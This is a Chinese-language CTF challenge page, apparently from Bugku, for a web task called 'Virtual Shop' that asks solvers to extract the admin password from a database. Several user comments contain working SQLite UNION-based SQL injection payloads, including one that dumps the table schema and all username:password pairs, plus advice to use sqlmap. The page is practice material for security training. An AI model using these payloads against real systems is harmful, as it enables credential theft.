Virtual ShopWEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 201
提  示:
描  述:
So, let's see if you can retrieve the `password` of the admin which\ \ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\ \ F100w"
评论
WCRH 4月前

鬼知道没有登录页面也有sql注入,实在没想的

回复 0

15614005380 7月前

只用sqlmap就可以做出来,很简单的一个注入

回复 0

FADogeCTF 8月前

union查询

回复 0

xiaobai568 9月前

前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了

回复 0

JJhello 9月前

sqlmap即可

回复 0

chaoge 10月前

sqlite,弄了半天认为是MySQL呢。

回复 0

justsosoloveyou 11月前

' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+

回复 1

SS3B 11月前

sqlmap一下子就出来了

回复 0

hopeinhand 1年前

联合查询注入,表名、列名、用户名全给了,都没啥好说的了

回复 0

WriteUp

image
heyile

1 金币

评分(0)

暂无评分

解题动态

oceanpeak 攻破了该题 1天前
阿甘先生 攻破了该题 3天前
abyk 攻破了该题 9天前
oliver99 攻破了该题 14天前
yiqibailan 攻破了该题 14天前
MOCHAOLIN 攻破了该题 14天前
yhcyhc 攻破了该题 20天前
whiteHaves 攻破了该题 23天前
POEighT 攻破了该题 23天前
bugku@ling 攻破了该题 25天前
shenkabu 攻破了该题 25天前
gzuwjl 攻破了该题 25天前
烟雨江叶 攻破了该题 1月前
黎明前夜111 攻破了该题 1月前
Garmin 攻破了该题 1月前
yunran 攻破了该题 1月前
13353488617 攻破了该题 1月前
dimo 攻破了该题 1月前
t1tl3d 攻破了该题 1月前
exp3n5ive 攻破了该题 1月前
问题反馈